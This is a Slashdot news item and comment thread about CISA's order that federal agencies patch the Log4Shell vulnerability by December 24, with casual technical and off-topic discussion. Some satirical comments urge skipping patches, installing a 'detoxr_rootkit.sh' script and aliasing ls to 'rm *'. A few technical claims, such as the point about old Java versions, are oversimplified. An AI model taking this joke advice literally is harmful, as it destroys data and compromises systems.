CISA Tells Federal Agencies To Patch Log4Shell Before Christmas (therecord.media) 57
The US Cybersecurity and Infrastructure Security Agency has told federal civilian agencies to patch systems affected by the Log4Shell vulnerability by Christmas Eve. From a report: The agency has added yesterday the Log4Shell bug (CVE-2021-44228) to its catalog of actively-exploited vulnerabilities, along with 12 other security flaws. According to this catalog, federal agencies have ten days at their disposal to test which of their internal apps and servers utilize the Log4j Java library, check if systems are vulnerable to the Log4Shell exploit, and patch affected servers. All of this must be done by December 24, according to a timeline provided in the catalog. In addition, CISA has also launched yesterday a dedicated web page providing guidance to the US public and private sector regarding the Log4Shell vulnerability.
Re: (Score:2)
You're a mean one, Mr. Grinch.
Re: (Score:3)
It's a zero-day, that means you've only got a few weeks to act! "D'Oh!"
Re: (Score:2)
Re: (Score:2)
Puny in comparison. Code Red saw a peak of about 350,000 and SQL Slammer under 100,000. Log4j is estimated to be a flaw in millions of systems.
Was it coded in Java? Does it have a logging function? Odds are it uses Log4j.
Re: (Score:2)
Re: (Score:2)
Re: (Score:2)
Re: (Score:3)
How Much Time Did They Give Solarwinds? (Score:2)
Re: (Score:2)
You're making a comment that makes no sense whatsoever, and then ask for specifics? That'll be... Hard.. :D
Re: (Score:1)
Re: (Score:2)
Open source is also corporate.
Your word of the day is proprietary. Please study it carefully.
Re: (Score:2)
Re: (Score:2)
Re: (Score:2)
Re: (Score:2)
Re: (Score:2)
Re: (Score:2)
Re: (Score:2)
Not sure why you are so damn angry and aggressive? Zero people have claimed that Open Source "is corporate" OP pointed out that there exists corporate Open Source and I agreed with that sentiment by giving you examples of such cases. MySQL was "corporate" back in the Monty days (he made money by selling a non GPL-licensed version to companies wanting to link to MySQL from proprietary applications), but it became Corporate when SUN bought all assets from Monty.
Oracle does not "participate" in MySQL, they own
Re: (Score:2)
Re: (Score:2)
Re: (Score:2)
Re: (Score:2)
Re: (Score:2)
Re: (Score:2)
Re: (Score:2)
Vaccinate my server? (Score:5, Funny)
This is like the jab, but for servers. No thanks. My server already has performance issues due to all the WiFi antennas nearby. I have been supplying it with DC current that has been proven to boost memory allocations.
Re: (Score:2)
If you carefully wrap the case in tin foil that will protect it from both wifi and even 5G.
But adhesive-backed tin foil can be hard to find. So I recommend instead using copper foil. It is sold online as guitar shielding tape. Surely your server is as important as some hippie's guitar, right?
Does this affect log4net, the .NET C# clone? (Score:1)
Does this affect log4net, the .NET C# clone of log4j? There are .NET C# running on Unix systems so I'd assume so.
Re: (Score:2)
Re: (Score:2)
No, deserializing an object from a remote server and then executing it is only a Java thing. In .NET/C# the deserialization only works on the data, not the code.
Re: (Score:2)
Wow, deserializing a randomly-obtained object in Java executes it? That's seriously bad.
Re: (Score:2)
Not sure why this modded down. Has Slashdot become as bad as Reddit?
Boss Called Again! (Score:2)
Re: Boss Called Again! (Score:3)
I have been telling people, do not install patches. Patches have side effects that can cause your server to behave erratically. What has really been proven to work is detoxifying your tmp directory and adding aliases to your shell config file. Just download and install detoxr_rootkit.sh from its website in Romania. Trust me I detoxed my tmp directory and immediately saw my server improve 10x while a bunch of previously blocked ports were opened up. A guy on YouTube found that aliasing ls to rm * cleared up
Re: (Score:2)
to inquire about nuking the data center from orbit.
It's the only way to be sure.
Re: (Score:2)
Sounds like your boss does so much cocaine maybe you should just route all your traffic through freenode
wot? (Score:1)
Re: (Score:3)
Well, you better get back at it because the 2.15 upgrade didn't fix everything and you will need to either upgrade again to 2.16, or delete the offending class from each classpath as a mitigation.
https://logging.apache.org/log4j/2.x/security.html [apache.org]
Impossible task (Score:2)
Most government test plans take weeks to execute. And everyone's going on vacation or already are gone.
Do they mean 12/24/2022?
Re: Impossible task (Score:2)
Well the alternative is hackers patching your server for you.
Re: (Score:3)
Really too bad that exploiting this issue to install patches for you is a crime. The world needs a patching vigilante.
Re: (Score:2)
A small reminder (Score:1)
The log4j vulnerability is bad, sure, no question. I'm sure it seemed a great idea at the time to be able to fetch external information to dynamically add to your logging messages (*not*).
However, let us not forget that - in order to be exploited - the server also has to be running a version of Java from 2018 or earlier. So any vulnerable servers are way, way behind on their security updates. As usual, it's not just the vulnerability, It is also incompetent or lazy sysadmins.
Re: (Score:3)
Just scan the systems, make someone fix them today (Score:2)
That would be a bit too slow (Score:2)
I already have at least 20 scans for this vulnerability in my web-server logs over the last 3 days. (No log4j or any other Java crap on my servers...)
Anybody that has not already patched this is criminally negligent.